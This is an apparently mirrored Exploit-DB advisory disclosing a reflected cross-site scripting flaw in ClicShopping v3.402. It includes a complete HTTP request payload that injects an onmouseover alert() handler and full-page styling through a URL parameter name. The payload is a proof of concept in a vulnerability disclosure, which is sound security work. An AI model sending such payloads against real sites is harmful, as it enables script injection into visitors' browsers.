[webapps] ClicShopping v3.402 - Cross-Site Scripting (XSS)
source link: https://www.exploit-db.com/exploits/51135
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
ClicShopping v3.402 - Cross-Site Scripting (XSS)
## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.20.2022
## Vendor: https://www.clicshopping.org/forum/
## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3
## Description:
The name of an arbitrarily supplied URL parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks.
The attacker can trick users to open a very dangerous link or he can
get sensitive information, also he can destroy some components of your
system.
## STATUS: HIGH Vulnerability
[+] Payload:
```js
GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)
## Proof and Exploit:
[href]()https://streamable.com/rzpgsu
## Time spent
`1:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Recommend
-
9
Wavlink WN533A8 - Cross-Site Scripting (XSS) ...
-
4
Jetpack 11.4 - Cross Site Scripting (XSS) ...
-
5
rukovoditel 3.2.1 - Cross-Site Scripting (XSS) ...
-
11
LISTSERV 17 - Reflected Cross Site Scripting (XSS) ...
-
5
WPForms 1.7.8 - Cross-Site Scripting (XSS) ...
-
15
Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) ...
-
6
SLIMSV 9.5.2 - Cross-Site Scripting (XSS) ...
-
6
AmazCart CMS 3.4 - Cross-Site-Scripting (XSS) ...
-
7
Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) ...
-
7
PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) ...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK